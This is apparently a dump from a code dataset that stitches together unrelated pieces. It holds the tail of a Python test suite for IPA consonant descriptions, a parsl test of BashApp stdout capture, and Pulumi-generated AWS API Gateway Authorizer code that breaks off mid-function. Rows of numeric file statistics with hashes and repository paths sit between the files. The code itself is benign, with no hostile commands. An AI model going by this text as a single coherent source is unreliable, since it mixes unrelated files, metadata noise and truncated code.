expected = "voiced pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʰ_is_the_representation_of_the_voiced_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʰ")
self.assertEqual(actual, expected)
def test_ʑ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̬ʰ")
self.assertEqual(actual, expected)
def test_ɕ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʰʷ")
self.assertEqual(actual, expected)
def test_ʑ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ɕ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʰʲ")
self.assertEqual(actual, expected)
def test_ʑ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ɕ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʰˠ")
self.assertEqual(actual, expected)
def test_ʑ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ɕ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʰˤ")
self.assertEqual(actual, expected)
def test_ʑ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ɕ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʰˤ")
self.assertEqual(actual, expected)
| 58.392336 | 144 | 0.857676 | 83,014 | 671,979 | 6.603477 | 0.008468 | 0.157849 | 0.241417 | 0.148765 | 0.994456 | 0.994456 | 0.994307 | 0.987238 | 0.875457 | 0.807009 | 0 | 0 | 0.088158 | 671,979 | 11,507 | 145 | 58.39741 | 0.889695 | 0.087503 | 0 | 0.539623 | 1 | 0 | 0.255187 | 0 | 0 | 0 | 0 | 0 | 0.249912 | 1 | 0.249912 | false | 0 | 0.000234 | 0 | 0.250263 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
314f797875e4eefc89f15ced2b5a0af7082c10e4 | 2,625 | py | Python | parsl/tests/test_bash_apps/test_kwarg_storage.py | daheise/parsl | 22fa8c75cdce782a0fa832692d8f19d7f57c25ab | [
"Apache-2.0"
] | null | null | null | parsl/tests/test_bash_apps/test_kwarg_storage.py | daheise/parsl | 22fa8c75cdce782a0fa832692d8f19d7f57c25ab | [
"Apache-2.0"
] | null | null | null | parsl/tests/test_bash_apps/test_kwarg_storage.py | daheise/parsl | 22fa8c75cdce782a0fa832692d8f19d7f57c25ab | [
"Apache-2.0"
] | null | null | null | import os
from parsl.app.app import App
@App('bash')
def foo(z=2, stdout=None):
return """echo {val}
""".format(val=z)
def test_command_format_1():
"""Testing command format for BashApps
"""
stdout = os.path.abspath('std.out.0')
if os.path.exists(stdout):
os.remove(stdout)
app_fu = foo(stdout=stdout)
print("app_fu : ", app_fu)
contents = None
assert app_fu.result() == 0, "BashApp exited with an error code : {0}".format(
app_fu.result())
with open(stdout, 'r') as stdout_f:
contents = stdout_f.read()
print("Contents : ", contents)
if os.path.exists('stdout_file'):
os.remove(stdout)
assert contents == '2\n', 'Output does not match expected string "2", Got: "{0}"'.format(
contents)
# ===========
stdout = os.path.abspath('std.out.1')
if os.path.exists(stdout):
os.remove(stdout)
app_fu = foo(z=3, stdout=stdout)
print("app_fu : ", app_fu)
contents = None
assert app_fu.result() == 0, "BashApp exited with an error code : {0}".format(
app_fu.result())
with open(stdout, 'r') as stdout_f:
contents = stdout_f.read()
print("Contents : ", contents)
if os.path.exists('stdout_file'):
os.remove(stdout)
assert contents == '3\n', 'Output does not match expected string "3", Got: "{0}"'.format(
contents)
# ===========
stdout = os.path.abspath('std.out.2')
if os.path.exists(stdout):
os.remove(stdout)
app_fu = foo(z=4, stdout=stdout)
print("app_fu : ", app_fu)
contents = None
assert app_fu.result() == 0, "BashApp exited with an error code : {0}".format(
app_fu.result())
with open(stdout, 'r') as stdout_f:
contents = stdout_f.read()
print("Contents : ", contents)
if os.path.exists('stdout_file'):
os.remove(stdout)
assert contents == '4\n', 'Output does not match expected string "4", Got: "{0}"'.format(
contents)
# ===========
stdout = os.path.abspath('std.out.3')
if os.path.exists(stdout):
os.remove(stdout)
app_fu = foo(stdout=stdout)
print("app_fu : ", app_fu)
contents = None
assert app_fu.result() == 0, "BashApp exited with an error code : {0}".format(
app_fu.result())
with open(stdout, 'r') as stdout_f:
contents = stdout_f.read()
print("Contents : ", contents)
if os.path.exists('stdout_file'):
os.remove(stdout)
assert contents == '2\n', 'Output does not match expected string "2", Got: "{0}"'.format(
contents)
return True
| 25.240385 | 93 | 0.587048 | 362 | 2,625 | 4.160221 | 0.160221 | 0.066401 | 0.042497 | 0.074369 | 0.89907 | 0.89907 | 0.88247 | 0.838645 | 0.838645 | 0.838645 | 0 | 0.014177 | 0.247619 | 2,625 | 103 | 94 | 25.485437 | 0.748354 | 0.029333 | 0 | 0.764706 | 0 | 0 | 0.221654 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.029412 | false | 0 | 0.029412 | 0.014706 | 0.088235 | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3169d2bd387da71bb5fe3932457e805399de815c | 36,204 | py | Python | sdk/python/pulumi_aws/apigateway/authorizer.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-11-10T16:33:40.000Z | 2021-11-10T16:33:40.000Z | sdk/python/pulumi_aws/apigateway/authorizer.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/apigateway/authorizer.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['AuthorizerArgs', 'Authorizer']
@pulumi.input_type
class AuthorizerArgs:
def __init__(__self__, *,
rest_api: pulumi.Input[str],
authorizer_credentials: Optional[pulumi.Input[str]] = None,
authorizer_result_ttl_in_seconds: Optional[pulumi.Input[int]] = None,
authorizer_uri: Optional[pulumi.Input[str]] = None,
identity_source: Optional[pulumi.Input[str]] = None,
identity_validation_expression: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Authorizer resource.
:param pulumi.Input[str] rest_api: The ID of the associated REST API
:param pulumi.Input[str] authorizer_credentials: The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
:param pulumi.Input[int] authorizer_result_ttl_in_seconds: The TTL of cached authorizer results in seconds. Defaults to `300`.
:param pulumi.Input[str] authorizer_uri: The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
:param pulumi.Input[str] identity_source: The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
:param pulumi.Input[str] identity_validation_expression: A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
:param pulumi.Input[str] name: The name of the authorizer
:param pulumi.Input[Sequence[pulumi.Input[str]]] provider_arns: A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
:param pulumi.Input[str] type: The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
pulumi.set(__self__, "rest_api", rest_api)
if authorizer_credentials is not None:
pulumi.set(__self__, "authorizer_credentials", authorizer_credentials)
if authorizer_result_ttl_in_seconds is not None:
pulumi.set(__self__, "authorizer_result_ttl_in_seconds", authorizer_result_ttl_in_seconds)
if authorizer_uri is not None:
pulumi.set(__self__, "authorizer_uri", authorizer_uri)
if identity_source is not None:
pulumi.set(__self__, "identity_source", identity_source)
if identity_validation_expression is not None:
pulumi.set(__self__, "identity_validation_expression", identity_validation_expression)
if name is not None:
pulumi.set(__self__, "name", name)
if provider_arns is not None:
pulumi.set(__self__, "provider_arns", provider_arns)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="restApi")
def rest_api(self) -> pulumi.Input[str]:
"""
The ID of the associated REST API
"""
return pulumi.get(self, "rest_api")
@rest_api.setter
def rest_api(self, value: pulumi.Input[str]):
pulumi.set(self, "rest_api", value)
@property
@pulumi.getter(name="authorizerCredentials")
def authorizer_credentials(self) -> Optional[pulumi.Input[str]]:
"""
The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
"""
return pulumi.get(self, "authorizer_credentials")
@authorizer_credentials.setter
def authorizer_credentials(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authorizer_credentials", value)
@property
@pulumi.getter(name="authorizerResultTtlInSeconds")
def authorizer_result_ttl_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The TTL of cached authorizer results in seconds. Defaults to `300`.
"""
return pulumi.get(self, "authorizer_result_ttl_in_seconds")
@authorizer_result_ttl_in_seconds.setter
def authorizer_result_ttl_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "authorizer_result_ttl_in_seconds", value)
@property
@pulumi.getter(name="authorizerUri")
def authorizer_uri(self) -> Optional[pulumi.Input[str]]:
"""
The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
"""
return pulumi.get(self, "authorizer_uri")
@authorizer_uri.setter
def authorizer_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authorizer_uri", value)
@property
@pulumi.getter(name="identitySource")
def identity_source(self) -> Optional[pulumi.Input[str]]:
"""
The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
"""
return pulumi.get(self, "identity_source")
@identity_source.setter
def identity_source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identity_source", value)
@property
@pulumi.getter(name="identityValidationExpression")
def identity_validation_expression(self) -> Optional[pulumi.Input[str]]:
"""
A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
"""
return pulumi.get(self, "identity_validation_expression")
@identity_validation_expression.setter
def identity_validation_expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identity_validation_expression", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the authorizer
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="providerArns")
def provider_arns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
"""
return pulumi.get(self, "provider_arns")
@provider_arns.setter
def provider_arns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "provider_arns", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class _AuthorizerState:
def __init__(__self__, *,
authorizer_credentials: Optional[pulumi.Input[str]] = None,
authorizer_result_ttl_in_seconds: Optional[pulumi.Input[int]] = None,
authorizer_uri: Optional[pulumi.Input[str]] = None,
identity_source: Optional[pulumi.Input[str]] = None,
identity_validation_expression: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
rest_api: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Authorizer resources.
:param pulumi.Input[str] authorizer_credentials: The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
:param pulumi.Input[int] authorizer_result_ttl_in_seconds: The TTL of cached authorizer results in seconds. Defaults to `300`.
:param pulumi.Input[str] authorizer_uri: The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
:param pulumi.Input[str] identity_source: The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
:param pulumi.Input[str] identity_validation_expression: A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
:param pulumi.Input[str] name: The name of the authorizer
:param pulumi.Input[Sequence[pulumi.Input[str]]] provider_arns: A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
:param pulumi.Input[str] rest_api: The ID of the associated REST API
:param pulumi.Input[str] type: The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
if authorizer_credentials is not None:
pulumi.set(__self__, "authorizer_credentials", authorizer_credentials)
if authorizer_result_ttl_in_seconds is not None:
pulumi.set(__self__, "authorizer_result_ttl_in_seconds", authorizer_result_ttl_in_seconds)
if authorizer_uri is not None:
pulumi.set(__self__, "authorizer_uri", authorizer_uri)
if identity_source is not None:
pulumi.set(__self__, "identity_source", identity_source)
if identity_validation_expression is not None:
pulumi.set(__self__, "identity_validation_expression", identity_validation_expression)
if name is not None:
pulumi.set(__self__, "name", name)
if provider_arns is not None:
pulumi.set(__self__, "provider_arns", provider_arns)
if rest_api is not None:
pulumi.set(__self__, "rest_api", rest_api)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="authorizerCredentials")
def authorizer_credentials(self) -> Optional[pulumi.Input[str]]:
"""
The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
"""
return pulumi.get(self, "authorizer_credentials")
@authorizer_credentials.setter
def authorizer_credentials(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authorizer_credentials", value)
@property
@pulumi.getter(name="authorizerResultTtlInSeconds")
def authorizer_result_ttl_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The TTL of cached authorizer results in seconds. Defaults to `300`.
"""
return pulumi.get(self, "authorizer_result_ttl_in_seconds")
@authorizer_result_ttl_in_seconds.setter
def authorizer_result_ttl_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "authorizer_result_ttl_in_seconds", value)
@property
@pulumi.getter(name="authorizerUri")
def authorizer_uri(self) -> Optional[pulumi.Input[str]]:
"""
The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
"""
return pulumi.get(self, "authorizer_uri")
@authorizer_uri.setter
def authorizer_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authorizer_uri", value)
@property
@pulumi.getter(name="identitySource")
def identity_source(self) -> Optional[pulumi.Input[str]]:
"""
The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
"""
return pulumi.get(self, "identity_source")
@identity_source.setter
def identity_source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identity_source", value)
@property
@pulumi.getter(name="identityValidationExpression")
def identity_validation_expression(self) -> Optional[pulumi.Input[str]]:
"""
A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
"""
return pulumi.get(self, "identity_validation_expression")
@identity_validation_expression.setter
def identity_validation_expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identity_validation_expression", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the authorizer
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="providerArns")
def provider_arns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
"""
return pulumi.get(self, "provider_arns")
@provider_arns.setter
def provider_arns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "provider_arns", value)
@property
@pulumi.getter(name="restApi")
def rest_api(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the associated REST API
"""
return pulumi.get(self, "rest_api")
@rest_api.setter
def rest_api(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rest_api", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
class Authorizer(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorizer_credentials: Optional[pulumi.Input[str]] = None,
authorizer_result_ttl_in_seconds: Optional[pulumi.Input[int]] = None,
authorizer_uri: Optional[pulumi.Input[str]] = None,
identity_source: Optional[pulumi.Input[str]] = None,
identity_validation_expression: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
rest_api: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides an API Gateway Authorizer.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
demo_rest_api = aws.apigateway.RestApi("demoRestApi")
invocation_role = aws.iam.Role("invocationRole",
path="/",
assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "apigateway.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
lambda_ = aws.iam.Role("lambda", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
authorizer = aws.lambda_.Function("authorizer",
code=pulumi.FileArchive("lambda-function.zip"),
role=lambda_.arn,
handler="exports.example")
demo_authorizer = aws.apigateway.Authorizer("demoAuthorizer",
rest_api=demo_rest_api.id,
authorizer_uri=authorizer.invoke_arn,
authorizer_credentials=invocation_role.arn)
invocation_policy = aws.iam.RolePolicy("invocationPolicy",
role=invocation_role.id,
policy=authorizer.arn.apply(lambda arn: f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": "lambda:InvokeFunction",
"Effect": "Allow",
"Resource": "{arn}"
}}
]
}}
\"\"\"))
```
## Import
AWS API Gateway Authorizer can be imported using the `REST-API-ID/AUTHORIZER-ID`, e.g.,
```sh
$ pulumi import aws:apigateway/authorizer:Authorizer authorizer 12345abcde/example
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] authorizer_credentials: The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
:param pulumi.Input[int] authorizer_result_ttl_in_seconds: The TTL of cached authorizer results in seconds. Defaults to `300`.
:param pulumi.Input[str] authorizer_uri: The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
:param pulumi.Input[str] identity_source: The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
:param pulumi.Input[str] identity_validation_expression: A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
:param pulumi.Input[str] name: The name of the authorizer
:param pulumi.Input[Sequence[pulumi.Input[str]]] provider_arns: A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
:param pulumi.Input[str] rest_api: The ID of the associated REST API
:param pulumi.Input[str] type: The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AuthorizerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an API Gateway Authorizer.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
demo_rest_api = aws.apigateway.RestApi("demoRestApi")
invocation_role = aws.iam.Role("invocationRole",
path="/",
assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "apigateway.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
lambda_ = aws.iam.Role("lambda", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
authorizer = aws.lambda_.Function("authorizer",
code=pulumi.FileArchive("lambda-function.zip"),
role=lambda_.arn,
handler="exports.example")
demo_authorizer = aws.apigateway.Authorizer("demoAuthorizer",
rest_api=demo_rest_api.id,
authorizer_uri=authorizer.invoke_arn,
authorizer_credentials=invocation_role.arn)
invocation_policy = aws.iam.RolePolicy("invocationPolicy",
role=invocation_role.id,
policy=authorizer.arn.apply(lambda arn: f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": "lambda:InvokeFunction",
"Effect": "Allow",
"Resource": "{arn}"
}}
]
}}
\"\"\"))
```
## Import
AWS API Gateway Authorizer can be imported using the `REST-API-ID/AUTHORIZER-ID`, e.g.,
```sh
$ pulumi import aws:apigateway/authorizer:Authorizer authorizer 12345abcde/example
```
:param str resource_name: The name of the resource.
:param AuthorizerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AuthorizerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorizer_credentials: Optional[pulumi.Input[str]] = None,
authorizer_result_ttl_in_seconds: Optional[pulumi.Input[int]] = None,
authorizer_uri: Optional[pulumi.Input[str]] = None,
identity_source: Optional[pulumi.Input[str]] = None,
identity_validation_expression: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
rest_api: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
